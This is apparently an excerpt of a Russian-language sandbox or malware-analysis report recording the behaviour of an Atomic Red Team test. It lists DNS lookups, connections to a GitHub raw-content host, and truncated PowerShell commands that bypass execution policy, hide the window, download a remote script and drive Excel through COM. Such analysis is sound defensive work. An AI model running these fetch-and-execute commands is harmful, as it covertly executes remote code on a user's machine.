Техническая информация
- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1086/payloads/test.ps1
- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/t1086/payloads/test.ps1 как %windir%\temp\ps4q8j7elk0vz51miynatd36grbouxch
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -windowstyle hidden -noprofile "$sr=New-Object System.IO.StreamReader((New-Object Net.WebClient).OpenRead('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atom...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -windowstyle hidden -noprofile "$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbo...